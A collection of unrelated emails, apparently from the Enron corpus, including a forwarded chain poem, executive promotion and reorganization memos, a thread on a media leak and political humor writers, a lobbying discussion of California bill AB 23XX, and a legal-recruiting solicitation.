lunch contained white tuna meat, > > >? > She ordered a parfait. > > >? > > > >? > I smiled when her dish I viewed, > > >? > And she asked if she amused me. > > >? > I answered, Yes, you do, > > >? > But also you confuse me. > > >? > > > >? > How come you order rich desserts, > > >? > When I feel I must be sensible? > > >? > She laughed and said, with wanton mirth, > > >? > I am tasting all that's possible. > > >? > > > >? > I try to eat the food I need, > > >? > And do the things I should. > > >? > But life's so short, my friend, indeed, > > >? > I hate missing out on something good. > > >? > > > >? > This year I realized how old I was, > > >? > She grinned, I've not been this old before. > > >? > So, before I die, I've got to try, > > >? > Those things for years I had ignored. > > >? > > > >? > I've not smelled all the flowers yet, > > >? > There's too many books I have not read. > > >? > There's more fudge sundaes to wolf down, > > >? > And kites to be flown overhead. > > >? > > > >? > There are many malls I have not shopped, > > >? > I've not laughed at all the jokes. > > >? > I've missed a lot of Broadway Hits, > > >? > And potato chips and cokes. > > >? > > > >? > I want to wade again in water, > > >? > And feel ocean spray upon my face. > > >? > Sit in a country church once more, > > >? > And thank God for It's grace. > > >? > > > >? > I want peanut butter every day, > > >? > Spread on my morning toast. > > >? > I want un-timed long-distance calls, > > >? > To the folks I love the most. > > >? > > > >? > I've not cried at all the movies yet, > > >? > Nor walked in the morning rain. > > >? > I need to feel wind in my hair, > > >? > I want to fall in love again. > > >? > > > >? > So, if I choose to have dessert, > > >? > Instead of having dinner. > > >? > Then should I die before night fall, > > >? > I'd say I died a winner. > > >? > > > >? > Because I missed out on nothing, > > >? > I filled my heart's desire. > > >? > I had that final chocolate mousse, > > >? > Before my life expired. > > >? > > > >? > With that, I called the waitress over, > > >? > I've changed my mind, it seems. > > >? > I said, I want what she is having, > > >? > Only add some more whipped-cream! > > >? > > > >? > Here is a little something for you all! > > >? > We need an annual Girlfriends Day! > > >? > If you get this twice, > > >? > then you have more than one girlfriend. > > >? > Be happy. > > >? > > > >? > ALL I NEED TO KNOW ABOUT LIFE I LEARNED FROM MY GIRLFRIENDS > > >? > > > >? >? * Good times are even better when they're shared. > > >? >? * A good long talk can cure almost anything. > > >? >? * Everyone needs someone with whom to share their secrets. > > >? >? * Listening is just as important as talking. > > >? >? * An understanding friend is better than a therapist... > > >? >??? and cheaper too! > > >? >? * Laughter makes the world a happier place. > > >? >? * Friends are like wine; they get better with age. > > >? >? * Sometimes you just need a shoulder to cry on. > > >? >? * Great minds think alike, especially when they are female! > > >? >? * When it comes to "bonding," females do it better. > > >? >? * YOU ARE NEVER TOO OLD FOR SLUMBER PARTIES!!!! > > >? >? * Girls just want to have fun. > > >? >? * It's important to make time to do "girl things." > > >? >? * Calories don't count when you are having lunch > > >? >??? (or any other food) with your girlfriends. > > >? >? * You can never have too many shoes. > > >? >? * GEMS MAY BE PRECIOUS, BUT FRIENDSHIP IS PRICELESS!!! > > >? > > > >? >? PLEASE PASS THIS ON TO ALL OF YOUR GIRLFRIENDS
There isn't much to the memo, but this is it! It came out well after the end of the work day for most folks. I believe that Patti has sent you my travel plans for next week. Have a great weekend! ---------------------- Forwarded by Sally Beck/HOU/ECT on 01/12/2001 09:20 PM --------------------------- Enron North America Corp. From: Office of the Chairman @ ENRON 01/12/2001 07:31 PM Sent by: Office of the Chairman@ENRON To: All Enron Worldwide cc: Subject: Managing Director and Vice President Elections The Managing Director PRC Committee met this week to elect individuals to Managing Director and Vice President positions. These employees are recognized as outstanding contributors to the organization, whose individual efforts have been instrumental in the continued success and growth of the company. We are pleased to announce the election of the following new Managing Directors and Vice Presidents. Please join us in congratulating these individuals on their new appointments. Managing Director ) Commercial Phillip K. Allen, ENA (EWS) West Gas Trading - Houston Franklin R. Bay, EBS Entertainment on Demand - Houston Timothy N. Belden, ENA (EWS) ) West Power Trading - Portland Michael R. Brown, EEL ) Executive - London Christopher F. Calger, ENA (EWS) West Power Origination - Portland Joseph M. Deffner, ENA (EWS) Treasury & Funding - Houston Timothy J. Detmering, ENA (EWS) Corporate Development - Houston William D. Duran, ENA (EWS) Generation Investments - Houston Robert S. Gahn, EES Commodity Structuring - Houston Kevin C. Garland, EBS Broadband Ventures - Houston Ben F. Glisan, Jr., Corporate ) Global Equity Markets - Houston Robert E. Hayes, ETS COMM Marketing - Houston Phillip R. Milnthorp, ENA (EWS) Canada Origination & Trading - Calgary Managing Director ) Commercial Support Sally W. Beck, ENW (EWS) Energy Operations Management - Houston Fernley Dyson, EEL Finance & Support Services - London Vice President ) Commercial Gregory Adams, EES MMC Management - Houston Robert Bayley, EEL-UK Origination ) London Jack D. Boatman, ETS Market Development ) Houston Rhenn Cherry, EES Assets/Labor ) Houston Niamh Clarke, EGM (EWS) Liquids Trading ) London Peter Crilly, EEL-UK Origination ) London Derek J. Davies, ENA (EWS) Canada Origination ) Calgary Mark D. Davis, Jr., ENA (EWS) East Power Trading ) Houston Charles Delacey, Corporate Finance ) Houston Paul Devries, ENA (EWS) Canada Origination ) Toronto Christopher H. Foster, ENA (EWS) West Power Trading ) Portland Jeffrey F. Golden, EES Corporate Development ) Houston Michael D. Grigsby, ENA West Gas Trading Group - Houston Troy A. Henry, EES Bundled Sales-Heavy Industrial ) Houston Rogers Herndon, ENA (EWS) East Power Trading ) Houston James W. Lewis, EES Underwriting ) Houston Christopher Mahoney, EGM (EWS) Liquids Trading ) London Andrew Marsden, EBS Broadband Ventures ) London John McClain, EBS Broadband Wholesale Origination ) Houston Kevin J. McGowan, EGM (EWS) American Coal ) Houston Albert E. McMichael, Jr., ENA (EWS) Gas Commodity Structuring ) Houston Ermes I. Melinchon, Central America Origination ) Houston Steven R. Meyers, EES Consumption ) Houston Lloyd D. Miller, ENA (EWS) Portfolio Management ) Houston Michael A. Miller, Wind Development / Execution-General Administration ) Houston Marcello Romano, EBS EEL-Broadband Trading ) London David A. Samuels, ENW (EWS) EnronOnline - Houston Per A. Sekse, EGM (EWS) Global Risk Markets ) New York Edward S. Smida, EBS Video on Demand ) Houston Mark Tawney, EGM (EWS) Weather Trading ) Houston Jon Thomsen, EBS Business Development ) Latin America/Canada ) Portland Barry L. Tycholiz, ENA (EWS) West Gas Origination - Houston Frank W. Vickers, ENA (EWS) East Gas Origination ) Houston Amit Walia, Corporate, Corporate Development ) Houston William White, EBS Global Bandwidth Risk Mgmt ) Houston Jonathan Whitehead, EEL EA Trading ) Japan Mark Whitt, ENA (EWS) West Gas Origination ) Denver John A. Zufferli, ENA (EWS) Canada Power Trading - Calgary Vice President ) Commercial Support Beth Apollo, EEL Financial Operations Executive ) London Marla Barnard, EBS Human Resources ) Houston Karen L. Denne, Corporate, Public Relations ) Houston Georganne M. Hodges, ENA (EWS) Trading, Origination & Power Plant Accounting ) Houston Phillip Lord, EEL Transaction Support ) London Peggy Mahoney, EES Marketing ) Communication ) Houston Steven Montovano, Corporate, Government & Regulatory Affairs ) Dublin Laura Scott, ENA (EWS) Canada Accounting ) Calgary Richard C. Sherman, ENA (EWS) Transaction Support ) Houston Gregory W. Stubblefield, EES Financial Planning & Reporting ) Houston Dennis D. Vegas, CALME International Public Relations ) Houston Vice President ) Specialized Technical Sami Arap Sobrinho, ESA (EWS) Legal ) Houston Merat Bagha, EBS Sales Engineering ) Houston Justin Boyd, EEL Legal ) London Mary Nell Browning, EBS Legal ) London Jonathan Chapman, EEL Legal ) London Robert D. Eickenroht, Corporate, Legal ) Houston Mark Evans, EEL Legal ) London David Forster, ENW (EWS) EnronOnline ) Houston Janine Juggins, EEL Tax ) London Peter C. Keohane, ENA (EWS) Canada Legal ) Calgary Pinnamaneni V. Krishnarao, ENA (EWS) Research Group ) Houston Travis C. McCullough, ENA (EWS) Finance Origination, Mergers/Acquisitions ) Houston Michael Popkin, ESA (EWS) SA- Risk Management/Network Integration ) Houston Elizabeth A. Sager, ENA (EWS) Physical Trading ) Houston Richard B. Sanders, ENA (EWS) Litigation ) Houston John W. Schwartzenburg, EECC Legal ) Houston Michael D. Smith, EES Legal ) Houston Marcus Vonbock Und Polach, EEL Legal ) London Jay C. Webb, ENW (EWS) EnronOnline Systems ) Houston Vice President ) Technical Donald R. Hawkins, ETS Quality Management ) Houston John R. Keller, ETS Engineering & Construction ) Houston
Shapiro is just unwilling to accept the fact that his guy is a very scary guy ... enough to scare away lifelong democrats. I got your voicemail. Thanks for following up. We would be looking for a contract relationship only, not full time. ----- Forwarded by Steven J Kean/NA/Enron on 12/04/2000 08:39 AM ----- Richard Shapiro 11/30/2000 09:37 AM To: Steven J Kean/NA/Enron@Enron cc: Subject: RE: FW: We have a leak ??? ---------------------- Forwarded by Richard Shapiro/NA/Enron on 11/30/2000 09:37 AM --------------------------- "Foster, Gary" <[email protected]> on 11/30/2000 09:11:46 AM To: "'[email protected]'" <[email protected]> cc: Subject: RE: FW: We have a leak I believe that Steve has been won over only for political (as in corporate politics) reasons but once he gets in the voting booth, he's still with you and Melissa. -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Thursday, November 30, 2000 9:18 AM To: Foster, Gary Cc: Rick and Amy Shapiro (E-mail); Steve and Melissa Kean (E-mail) Subject: Re: FW: We have a leak Thanks- you got it about right .....except that Kean's Democratic credentials are seriously in question these days as are his " liberal- minded" credentials. You may have won over an individual who can now clearly be categorized as a lost soul. "Foster, Gary" <[email protected]> on 11/30/2000 08:07:18 AM To: "Rick and Amy Shapiro (E-mail)" <[email protected]>, "Steve and Melissa Kean (E-mail)" <[email protected]> cc: Subject: FW: We have a leak steve and rick- mark halperin is the political director at abc -- the smart guy sitting to peter jennings's right all night on election night who knew everything. his brother is a speechwriter at the nsc. you'll see below his recommendation of mark katz and his number. i also emailed peggy noonan to ask for any ideas. haven't heard from her yet. she's been very busy writing some of the more brilliant commentary on the current situation which i'm sure hasn't been allowed into the shapiro empire. speaking of stock prices, what the hell happened yesterday? i'm still a stock holder (very small) so pass my bitches along to koenig. -----Original Message----- From: Foster, Gary Sent: Thursday, November 30, 2000 8:42 AM To: 'Halperin, Mark' Subject: RE: We have a leak what do you mean 'on principle'? there couldn't be a better issue for a clinonista to stand for than busting up monopolies' hold on the little people. actually enron's government affairs office is run by a bunch of democrats and they just hired summer's congressional person at treasury to run their d.c. office. is your brother still at the nsc? katz is the person i was thinking of. i'll pass his name along. thanks. -----Original Message----- From: Halperin, Mark [mailto:[email protected]] Sent: Wednesday, November 29, 2000 4:22 PM To: 'Foster, Gary' Subject: RE: We have a leak after re-reading your original email (the first words of which were that i should share it with sam and gma) i felt a little less bad on my own....it was still dumb...and our secret is safe..keep sending them by brother is very funny...i'm not sure he would do it on principle...but i can ask...the person to ask is mark katz...who wrote for clinton and gore...very funny..very automatic...use my name...let me know if there is a problem 212-496-7013 -----Original Message----- From: Foster, Gary [mailto:[email protected]] Sent: Wednesday, November 29, 2000 9:30 AM To: Halperin, Mark Subject: RE: We have a leak your level of apologizing was not necessary but after re-reading my initial email i can see where you could be mistaken that i was upset. i'm not. i just don't want to break one of the only flows of insider information that i have left -- even if it's into a has-been. but while i have you gravelling, you could do something for me. i just got a call from my old boss at enron and he is looking to hire someone as a consultant who specializes in humor writing. they want to try a humorous approach in taking on the monopoly utilities in the battle over electricity deregulation. do you know anyone in the clinton administration who has been responsible for some of the president's humorous speeches? or anyone that fits this bill? what about your brother? it seems like i read a profile of one of them recently who was leaving. the only republican i can think of is landon parvin who has been around forever. -----Original Message----- From: Halperin, Mark [mailto:[email protected]] Sent: Wednesday, November 29, 2000 8:49 AM To: 'Foster, Gary' Subject: RE: We have a leak two people here did stupid things (first me, by in a hurry giving instructions to my colleague about what to do with the information;then my colleague for sending it to somebody untrustworthy) so: i apologize...being in a hurry is no excuse for being careless..... here's the silver linings: 1. gma seems to have gotten it some other way later in the day, so from there point of view, they aren't focused on where it came from 2. there is literally no one at abc who knows i know you 3. i give you my word that i will never be at all careless with anything from you again, and won't let even one person have access to emails/information from you...the person in this case doesn't know it came from you (or jb for that matter, since i had already taken her name and your name off of it) again, i'm sorry.....i have zero tolerance for such carelessness, and pleading being overwhelmed with work on the story is no excuse ps: i hope you saw jamie's interview...it was priceless -----Original Message----- From: Foster, Gary [mailto:[email protected]] Sent: Wednesday, November 29, 2000 8:37 AM To: Halperin, Mark Subject: FW: We have a leak when i said 'pass along', i only meant the information, not the entire email. i'm not going to fess up if you and everyone else who has it doesn't reveal their source. -----Original Message----- From: Jean Becker [mailto:[email protected]] Sent: Tuesday, November 28, 2000 7:33 PM Subject: We have a leak Everyone at ABC has a copy of the last e-mail I sent everyone concerning President Bush's appearances on the morning shows tomorrow. We have a leak. I suspect someone in total innocence is forwarding my e-mails to friends and family, etc. I need for all of you to take a very careful look at your forwarding lists and think about where this leak might be. If you think you know where the leak is, please, please let me know. If we can't find it, these e-mails will cease and desist. Jean P.S. In case you were wondering, yeah, ABC is not happy.
-----Original Message----- From: Bhatia, Randy Sent: Wed 2/13/2002 12:48 PM To: Scott, Susan M. Cc: Subject: FW: -----Original Message----- From: Holst, Keith Sent: Thursday, January 10, 2002 10:52 AM To: Bhatia, Randy Subject: << Untitled >> << FW: >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << FW: >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << Untitled >> << FW: >> --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 9:05:35 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: '[email protected]' Date: Wednesday, December 12, 2001 8:28:03 GMT Subject: -----Original Message----- From: Eric Fischesser Sent: Wednesday, December 12, 2001 3:23 PM To: David Neal Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 8:24:34 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 8:22:00 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 8:12:36 GMT Subject: <<Enron price sheet2.pdf>> --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 8:08:04 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 8:04:09 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 5:23:31 GMT Subject: <<Enron price sheet2.pdf>> --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 5:30:00 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Wednesday, December 12, 2001 3:59:38 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Thursday, December 13, 2001 2:13:25 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Thursday, December 13, 2001 3:52:58 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Thursday, December 13, 2001 4:08:34 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: '[email protected]' Date: Thursday, December 13, 2001 5:24:05 GMT Subject: -----Original Message----- From: Eric Fischesser Sent: Thursday, December 13, 2001 12:13 PM To: David Neal Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Thursday, December 13, 2001 9:14:45 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Thursday, December 13, 2001 9:55:01 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Friday, December 14, 2001 1:54:44 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Friday, December 14, 2001 3:57:10 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Friday, December 14, 2001 4:35:21 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Friday, December 14, 2001 4:50:50 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Friday, December 14, 2001 7:45:43 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Monday, December 17, 2001 2:00:45 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Tuesday, January 8, 2002 4:44:30 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Tuesday, January 8, 2002 8:03:57 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: Holst, Keith </O=ENRON/OU=NA/CN=RECIPIENTS/CN=KHOLST> Date: Tuesday, January 8, 2002 9:02:42 GMT Subject: --------- Inline attachment follows --------- From: <[email protected]> To: '[email protected]' Date: Tuesday, January 8, 2002 9:57:43 GMT Subject: -----Original Message----- From: Eric Fischesser Sent: Tuesday, January 08, 2002 4:53 PM To: David Neal Subject:
Jeff; In response to your questions, I cannot explain why everyone missed this bill in the past, I have raised it to the attention of my clients twice in the last two months. However, now that it is moving they have got the message. Williams (Kern River) is going to host a meeting today to create a coalition to oppose the bill. Bev Hansen knows where the meeting will take place. In addition to Williams, I understand that Questar, WSPA, and other retail customer groups will join the coalition and oppose the bill. My client Wild Goose will also be listed in opposition, but they don't carry that much clout or name recognition so far. I am hopeful that other groups will surface soon. As for the bill itself, the problem is two fold. First, the CPUC decides what infrastructure to build at the request of the utilities. They take input from customers, but Loretta is a command and control type all the way, and she will try to scare away private capital investment by interstate pipelines by mandating that the utilities build a gold-plated state-regulated system. While the bill does not (and cannot legally) bar interstate pipelines from coming into the state, it has provisions which will prevent large customers from signing up with the interstates. The large customers have to commit to take firm service on a 5 year basis with exit fees. If they don't take this, they can only get interruptible service from the utilities. Many if not all large customers, especially generators cannot afford to take partial service from an interstate and have only interruptible access to the LDC system. This is the same dilemma that the RLS tariff caused. My belief is that the obligation on the part of the commission to provide the utilities with cost recovery for the new investments will be used as justification by the utilities for another attempt to reinstitute the RLS tariff or an onerous peaking rate. The Commission will impose a premium price on service to customers who have not undertaken the firm 5 year commitment and will therefore be unable to economically take partial requirements service from an interstate. My view is based on Sempra's reaction to the current peaking rate proposed decision and statements by Lynch's office. This could interfere with Enron gas sales over the interstates, and would certainly threaten any Transwestern plans for building across the border into California, although that does not appear to be a high priority at this time. This bill will also make it more costly to develop gas supply arrangments for new power plants which had hoped to direct connect to interstate pipeline capacity for a portion of their needs. Please call if you have further questions. Mike Day -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Tuesday, July 17, 2001 10:09 AM To: [email protected] Cc: [email protected]; [email protected]; [email protected]; [email protected]; [email protected] Subject: Re: AB 23XX Bad Bill Alert I've taken a quick look at the bill and have attached for easy viewing. Few questions. Mike, I understand from our conversation yesterday that your following this on behalf of Questar. Do we know if the other pipelines have been active in any discussions on this bill? What about the generators? Have then been involved, since presumably, their in need of lots more capacity (and they're referenced in the bill)? What about large customers? They been screaming for more infrastructure, too, and many have blamed SoCalGas (and the PUC) for not delivering it. Do we know if pipelines, generators, large customers are supporting or opposing the bill? I'll try to check around, too, in between the electric mayhem. There doesn't seem to be anything in the bill that prevents the interstates from building into the state. If that's true, wouldn't the PUC take those projects into account when doing its analysis and only require the utility to construct (and noncore to take) capacity that isn't already being met by others (i.e., interstates) bringing pipe into the state? Any info you can provide on these fronts would be very useful. Don't want Enron too far out in front of opposition until we find out a bit more regarding 1) whose fer and agin it and 2) analysis of what the bill actually does/does not do. Thanks again for the heads up. Best, Jeff (See attached file: 23XX.pdf) James D Steffes To: Harry Kingerski/Enron@EnronXGate cc: Jeff Dasovich/NA/Enron@Enron, Susan J 07/17/2001 Mara/NA/Enron, Paul Kaufman/Enron@EnronXGate 07:43 AM Subject: AB 23XX Bad Bill Alert Harry -- Can you track down this bill and determine impact? We'll discuss on Thursday. Jim ---------------------- Forwarded by James D Steffes/NA/Enron on 07/17/2001 07:43 AM --------------------------- MDay <[email protected]> on 07/16/2001 06:03:33 PM To: "'Bev Hansen, Enron lobbyist'" <[email protected]>, "'Hedy Govenar, Enron Sacto lobbyist'" <[email protected]>, "'Scott Govenar, Enron lobbyist'" <[email protected]>, "'Harry Kingerski'" <[email protected]>, "'Jim Steffes, Enron'" <[email protected]> cc: Subject: AB 23XX Bad Bill Alert Is AB 23XX moving with a chance of passage? I just learned that this Pescetti bill that was AB 1425 was revived as a 2X bill. It is very anti-competitive, and could hurt a number of TW, EES, or ENA gas deals by binding customers to 100% utility service through the imposition of large exit fees by the CPUC. If there is a chance that it moves, we need to discuss the effect of this bill. Mike Day http://info.sen.ca.gov/pub/bill/asm/ab_0001-0050/abx2_23_bill_20010625_amend ed_sen.pdf
On November 8, the Office of the Chairman, issued an important communication, announcing significant organizational changes in Enron's worldwide operations. The purpose of this memo is to share with you the decisions that are underway to restructure Enron,s operations in South America. The basic organizational framework has been set. As you know, Diomedes Christodoulou and Jim Bannantine will be assuming new responsibilities within Enron. Replacing them will be Orlando Gonzalez and Joe Kishkill, who will become the Co-Presidents of South America, reporting to Dave Delainey and John Lavorato. They will share overall responsibility; however, Orlando,s focus will be on direct sales origination, commercial/government relationships and regulatory issues. Joe,s focus will be on wholesale origination, financial and operating performance and overall country management. In addition, Orlando will continue as President and CEO of Elektro until its ultimate sale. The existing, large integrated asset base in South America (excluding Elektro) will be managed and operated by Rebecca McDonald and Jim Hughes in Enron Global Assets, which is part of Enron Wholesale Services under Mark Frevert. Ultimately, there will be very close coordination in both Brazil and Argentina between Enron Americas and Enron Global Assets to ensure that our reputation in South America is protected, our asset positions are being managed prudently and that commercial opportunities surrounding these assets are pursued. The remaining natural gas and electrical commercial activities in South America will be organized around the highly successful North American network business model. This model employs people, market making, physical commodities, capital and assets to provide reliable, flexible and high-value products to our customers. It is people and intellectual capital based and enjoys high rates of return on invested capital. In the interest of pursuing this strategy, the following teams will report to Joe and Orlando: The Commercial Origination team will be lead by Brett Wiggs. The team will focus on covering South American markets, primarily Brazilian and Argentine natural gas and electricity, with the following goals: ? Generating new, innovative, reliable and high value products and services needed by the market by utilizing our commodity, asset and capital capabilities; ? Providing those products and services across South America and across the value chain, including wholesale and retail, based upon the highest value opportunity; ? Finding structural value arbitrages in the South American market and move quickly to capitalize; ? Assisting the Risk Management and Trading organization in managing the overall risk of the organization; ? Managing all new power and asset development opportunities in South America consistent with this strategy, and ? Providing the Risk Management and Trading organization information and deal flow. The Commercial Origination team will consist of a diverse group of people who work as a single team which bring the required skills including commodity, capital, regulatory, asset, development, market, structuring, deal execution, finance and country knowledge necessary to reach our goals. The Trading and Risk Management team will be headed by Remi Collonges. The team will continue to develop pricing information and manage the price book for the relevant energy markets in support of the wholesale and direct sales efforts. Additionally, the team will work toward implementation of actively trading South American energy commodities. This group will be responsible for managing Enron South America,s overall risk and will have a direct reporting relationship with John Lavorato in his role as head of the Americas risk activities. The Argentine effort will be integrated into the overall South American Commercial Origination and Trading and Risk Management groups; however, we will continue to maintain an Argentine office headed by Michael Guerriero. The goal of the reorganization is to create a flat team oriented organization that is very market and commercially focused. The following support functions will assist the overall business objectives of the commercial team and will report into Joe and Orlando, plus into their line functions in Houston. The overall goal is to ensure that the South American business units have an adequate support organization to evaluate opportunities, as well as manage day-to-day business and risk. Otherwise, the Houston infrastructure will provide resources as needed to manage peak requirements in South America, not unlike other businesses in Enron Americas. These groups include: The Government Affairs team, which will be headed by Sergio Assad, will manage the relationships with the relevant regulatory agencies as well as governmental ministries. The primary regulatory goal will be to facilitate, in the near term, substantive changes to the regulatory rules to allow a functioning wholesale traded market in Brazil and Argentina. Sergio will assume his responsibilities upon completion of the Elektro sale. During this interim period, Jose Bestard will continue to be in charge of the regulatory function. Once Sergio makes the transition, he will also report to Rick Shapiro in Enron Government Affairs. The Finance team will be headed by Britaldo Soares. The team will manage the interface with Enron Global Finance. Britaldo will transition from his current duties at Elektro upon completion of the Elektro sale. Britaldo will also report to Joe Deffner in Enron Global Finance. Rob Gay will be assisting Britaldo during the transition, while continuing his work on the Cuiaba project. The Legal team, which will be lead by Randy Young, as general counsel, and John Novak, as deputy general counsel, will manage South America,s legal requirements. Randy and John will also report to Mark Haedicke in Enron Wholesale Services - Legal Department. Miguel Padron will become Chief of Staff. Human Resources, Information Technology, Treasury, Accounting & Reporting, as well as Administration will report to Miguel. This will bring focus to essential, but non-commercial functions, as well as more efficiently manage key matrix reporting relationships with Enron. Miguel will also report to David Oxley in Enron Wholesale Services ) Human Resources and Wes Colwell in Enron Wholesale Services ) Business Analysis and Reporting. These changes are consistent with Enron's evolving business strategy and reflect our continuing commitment to grow the company by maximizing our financial and intellectual capital. However, in line with the new organizational structure and the near term potential for business in the region, further budget reductions will be necessary. People directly affected will be notified shortly. Enron is committed to continue the successful implementation of its businesses in South America. We believe that as the markets develop, we are uniquely positioned to leverage Enron,s core capabilities and create shareholder value.
Dear William: I hope that you are well. Over the past six months, Glocap Legal Search has solidified its position as the nation's premier in-house legal recruiting firm. We have worked very hard to create a truly unique and powerful legal recruiting company. Glocap's selection by Forbes.com as the best recruiting website in the country was gratifying, but even more important are the positive reviews that we regularly receive from our clients. We recruit for Fortune 500 companies, major financial institutions, consulting companies, investment banks and many other public and private companies of all sizes. I am writing to ask for your help. Do you know anyone who might be interested in hearing more about us? I have briefly summarized a very small sample of the many truly outstanding, pre-screened attorneys available through our unique service. We have many more, in all practice areas and experience levels. Call me if you would like to discuss how we can be of service to your company. Attorneys available now include: 1. Northwestern University School of Law (cum laude) graduate has over 4 years experience working on computer software, intellectual property and internet related issues, with particular emphasis on e-commerce and complex licensing. This very highly regarded attorney seeks a corporation or financial institution that needs in house counsel for domestic and/or international tech law matters. Midwest preferred. 2. Currently a Managing Director of a major investment bank, this prominent attorney has also served as one of the top partners at an elite, blue-chip law firm. The attorney seeks new challenges as a GC/CFO/VP of Business Development at a media, telecommunications or related company. An awesome talent who has been extremely successful at each stage of their career. 3. A truly uniquely credentialed attorney who graduated Stanford Law School and has a graduate degree from Columbia, this candidate is also a shared recipient of the Pulitzer Prize for investigative reporting and writing. Currently a litigator at a top law firm, this attorney has the intelligence, writing ability, and work ethic to enhance any company's litigation department. Fluent in Spanish. 4. Georgetown Law Center (cum laude) and Stanford undergraduate has over four years experience advising both private and public companies on general business/corporate matters as well as venture and debt financings, licensing, mergers and acquisitons, and public offerings. Terrific experience in securities and corporate counseling. Available either in California or East Coast. 5. A talented attorney with over eight years experience doing project finance and lending, mergers and acquisitions, and capital markets transactions at two very prominent law firms. This Russian speaking attorney has represented investors, lenders, and multilateral agencies in power, energy and natural resources industry sectors, as well as financial services, IT and telecom clients in a wide variety of m & a matters. 6. This 1996 graduate of a highly regarded law school has over five years of solid general corporate experience. Great drafting skills and superb presence, this candidate will be a very welcome addition to any in house legal staff that seeks an intelligent, hard working and very well trained corporate generalist. 7. Attorney who graduated first in his law class is practicing corporate restructuring and reorganization at one of New York's premier law firms. Four years experience in all aspects of distressed debt transactions, including asset sales, plans of reorganization, asset-based financings, cross-border insolvency issues and strategic distressed acquisitions. Seeking in-house or investment banking position. 8. Yale Law School, Princeton University (magna cum laude). Senior VP of one of top financial institutions in the world, this attorney has played a leading legal, business, integration and managerial role in acquisitons, joint ventures, equity investments and divestitures. Also has broad epxerience in securities law at a top law firm. Very well spoke and personable, this candidate is interested in a senior business/GC type position. NY metro area. 9. Yale University (magna cum laude), Harvard Law School (cum laude) candidate with three years transactional experience at premier law firm before leaving to become general counsel at a new media company. Has broad corporate, real estate and and technology experience. Exceedlingly smart, conscientious, and energetic. This candidate will be an enormous asset to any company that hires him. Wants NY area only. 10. UChicago Law School, over five years extraordinary experience at both a top law firm and a premier incubator. Practice areas include corporate, securities, intellectual property, mergers & acquisitions, venture capital financings and technology. Dynamic, very highly regarded attorney also speaks mandarin chinese. Wants in-house or legal/business position in Southern California only. This is just a very small sample of the attorney/candidates that we work with. We can of course tailor our search to meet any specifications that you wish. Feel free to call us to discuss our service, or to refer us to a colleague that might be interested in hearing more about us, or to obtain references from our clients. I hope I will be speaking with you soon. Thank you for taking the time to consider our service. -- Steven J. Greenberg, Esq. Managing Partner Glocap Legal Search LLC Carnegie Hall Tower 152 West 57th Street, 27th Floor New York, New York 10019-3310 212-333-6431 phone 212-333-6401 fax 